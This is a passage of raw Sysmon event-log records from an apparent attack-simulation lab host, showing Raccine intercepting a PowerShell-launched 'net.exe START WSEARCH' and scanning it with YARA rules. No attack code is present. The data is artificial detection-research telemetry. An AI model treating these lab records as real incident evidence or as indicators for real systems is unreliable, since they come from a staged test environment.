Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245488Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.239{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-C708-010000000E02}6180C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245487Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.239{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-C708-010000000E02}6180C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245486Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.239{9DBE88B5-5543-61B2-C708-010000000E02}6180C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\gen_powershell_invocation.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245483Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.224{9DBE88B5-5543-61B2-C608-010000000E02}77201112C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-C508-010000000E02}6204C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245477Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.213{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44926092C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-C508-010000000E02}6204C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245476Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.213{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-C508-010000000E02}6204C:\Program Files\Raccine\yara64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+127ef|C:\Program Files\Raccine\Raccine.exe+5e97|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245475Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.213{9DBE88B5-5543-61B2-C508-010000000E02}6204C:\Program Files\Raccine\yara64.exe-----"C:\Program Files\Raccine\yara64.exe" "C:\Program Files\Raccine\yara\ext-vars-test.yar" C:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmp -d Name="net.exe" -d ExecutablePath="C:\Windows\System32\net.exe" -d CommandLine="'C:\Windows\system32\net.exe' START WSEARCH" -d TimeSinceExeCreation=1220 -d ParentName="powershell.exe" -d ParentExecutablePath="C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -d ParentCommandLine="'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' " -d ParentTimeSinceExeCreation=1878 -d GrandParentName="(unavailable)" -d GrandParentExecutablePath="" -d GrandParentCommandLine="" -d GrandParentTimeSinceExeCreation=0C:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=21F3213DA30E04E7EAE6AB37873D96ED,SHA256=63E9D2FEBB3705D5C9BC7489BCEC2B957AAEF8A5D13D0EBAEDC65965D65947E6,IMPHASH=C66AE7C04AD509B05651E45E6E91359E{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245473Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.209{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002245458Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.202{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002245392Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.162{9DBE88B5-C32E-61A8-0C00-000000000E02}8482116C:\Windows\system32\svchost.exe{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245390Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.156{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002245375Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.149{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002245309Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.110{9DBE88B5-C32E-61A8-0C00-000000000E02}8482116C:\Windows\system32\svchost.exe{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245308Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.109{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+5894|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245306Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.104{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002245291Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.097{9DBE88B5-5532-61B2-A808-010000000E02}9044928C:\Windows\system32\wbem\wmiprvse.exe{9DBE88B5-1135-61B1-7FFF-000000000E02}3164C:\Program Files\Raccine\RaccineSettings.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\combase.dll+2800|C:\Windows\System32\RPCRT4.dll+62d8b|C:\Windows\System32\combase.dll+6536c|C:\Windows\System32\combase.dll+65022|C:\Windows\System32\combase.dll+63938|C:\Windows\System32\combase.dll+6169d|C:\Windows\System32\combase.dll+60d6f|C:\Windows\System32\combase.dll+7c2c9|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49cee|C:\Windows\System32\RPCRT4.dll+30ed7|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c 10341000x80000000000000002245225Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.054{9DBE88B5-C32E-61A8-0C00-000000000E02}8482116C:\Windows\system32\svchost.exe{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+54c6|C:\Windows\System32\RPCRT4.dll+7a583|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653ea|C:\Windows\System32\RPCRT4.dll+4a284|C:\Windows\System32\RPCRT4.dll+4919d|C:\Windows\System32\RPCRT4.dll+49a4b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245224Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.052{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-C408-010000000E02}1172C:\Windows\system32\net.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\Raccine\Raccine.exe+c914|C:\Program Files\Raccine\Raccine.exe+57ef|C:\Program Files\Raccine\Raccine.exe+18dc|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 23542300x80000000000000002245223Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.050{9DBE88B5-5543-61B2-C308-010000000E02}5464ATTACKRANGE\AdministratorC:\Program Files\Raccine\Raccine.exeC:\Users\ADMINI~1\AppData\Local\Temp\RaccineUserContext\RacBC08.tmpMD5=D41D8CD98F00B204E9800998ECF8427E,SHA256=E3B0C44298FC1C149AFBF4C8996FB92427AE41E4649B934CA495991B7852B855,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002245222Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.043{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-C408-010000000E02}1172C:\Windows\system32\net.exe0x1c3aC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+c6f00|C:\Windows\System32\KERNELBASE.dll+c6e21|C:\Program Files\Raccine\Raccine.exe+1876|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245216Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.042{9DBE88B5-5543-61B2-C308-010000000E02}54645672C:\Program Files\Raccine\Raccine.exe{9DBE88B5-5543-61B2-C408-010000000E02}1172C:\Windows\system32\net.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Raccine\Raccine.exe+1848|C:\Program Files\Raccine\Raccine.exe+16914|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002245215Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.042{9DBE88B5-5543-61B2-C408-010000000E02}1172C:\Windows\System32\net.exe10.0.14393.2430 (rs1_release_inmarket_aim.180806-1810)Net CommandMicrosoft® Windows® Operating SystemMicrosoft Corporationnet.exe"C:\Windows\system32\net.exe" START WSEARCHC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=C6B6DAA95CEA707F8D986D933E4A9596,SHA256=FDDC5F29F779A6EF73D70A2C551397FDEE63F549F2BCE4FE6A7AEEDC11F4F72E,IMPHASH=C41B15F592DE4589047CE5119CE87468{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCH 10341000x80000000000000002245214Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.034{9DBE88B5-3AAE-61AE-0EA8-000000000E02}68046848C:\Windows\system32\conhost.exe{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245209Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.032{9DBE88B5-3A8E-61AE-DBA7-000000000E02}44924832C:\Windows\system32\csrss.exe{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002245208Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.032{9DBE88B5-3AAE-61AE-0DA8-000000000E02}67766968C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+384146|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4809|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\d2fec25a57171882b3ac890135fca30b\System.ni.dll+2c4179|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca360024(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97a002a(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c9803a9c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e5aab(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e593c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97d665c(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3b9e(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e3710(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e347d(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97e30b8(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+ca2ab3e6(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c8363(wow64)|C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Manaa57fc8cc#\ede86fb324c014012c4c689e792a89f4\System.Management.Automation.ni.dll+c97c78d5(wow64) 154100x80000000000000002245207Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:13:07.028{9DBE88B5-5543-61B2-C308-010000000E02}5464C:\Program Files\Raccine\Raccine.exe1.4.2.0 BETAA Simple Ransomware Vaccine - see https://github.com/Neo23x0/RaccineRaccineRaccineRaccine.exe"C:\Program Files\Raccine\Raccine.exe" "C:\Windows\system32\net.exe" START WSEARCHC:\Users\Administrator\Downloads\PSBits-master\PSBits-master\IFilter\ATTACKRANGE\Administrator{9DBE88B5-3A8F-61AE-5CC3-9B0500000000}0x59bc35c2HighMD5=287F6CFBFFD83B75A0F8F749B0F636F3,SHA256=E5364CE4BD1814E003215BFF10DD2F191C33199260DFD2688D4F6CCE4A7C75B8,IMPHASH=B9673CBFF2550CFBFA1668EF53412C24{9DBE88B5-3AAE-61AE-0DA8-000000000E02}6776C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" 23542300x80000000000000002245000Microsoft-Windows-Sysmon/Operationalwin-dc-137.attackrange.local-2021-12-09 19:12:52.340{9DBE88B5-5532-61B2-A608-010000000E02}7540ATTACKRANGE\AdministratorC:\Program 